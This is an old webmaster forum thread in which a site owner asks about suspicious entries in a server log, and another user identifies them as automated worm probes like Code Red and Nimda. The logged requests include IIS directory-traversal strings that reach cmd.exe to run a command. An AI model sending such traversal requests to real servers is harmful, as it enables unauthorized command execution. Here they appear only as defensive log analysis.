Help with log entries

Forum Moderators: DixonJones

Message Too Old, No Replies

Help with log entries

CSTX

6:51 pm on Mar 18, 2002 (gmt 0)

Can someone tell me what the following log entries mean.
GET /index.cfm FrodoSoft+-+got+an+entry+for+that?++++++++++++
GET /index.html (with same FrodoSoft suffix)
GET /favicon.ico (with same FrodoSoft suffix)
GET /index.asp (with same FrodoSoft suffix)
GET /info/info.cfm (with same FrodoSoft suffix)
GET /msadc/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe /c%20dir 404 3415 414
GET /wwwroot/ (with same %5c suffix)
GET /cgi-bin (with same %5c suffix)
GET /_vti_bin (with same %5c suffix)
GET /scripts/ (with same %5c suffix)
GET /iisadmpwd/ (with same %5c suffix)
GET /upload.asp
POST /upload.asp

amoore

7:11 pm on Mar 18, 2002 (gmt 0)

They are requests for scripts and stuff that are common security problems. With some installations of webservers, you can break into the system by requesting cleverly formed web pages from the server. Usually, an automated virus or worm makes these requests from a machine that has already been compromised.

Search around for pages on things like "code red" or "nimda" for examples.

CSTX

7:17 pm on Mar 18, 2002 (gmt 0)

Does the FrodoSoft entries (FrodoSoft is a virus) mean that the person accessing the website may have it on his operating system and not know he is infected?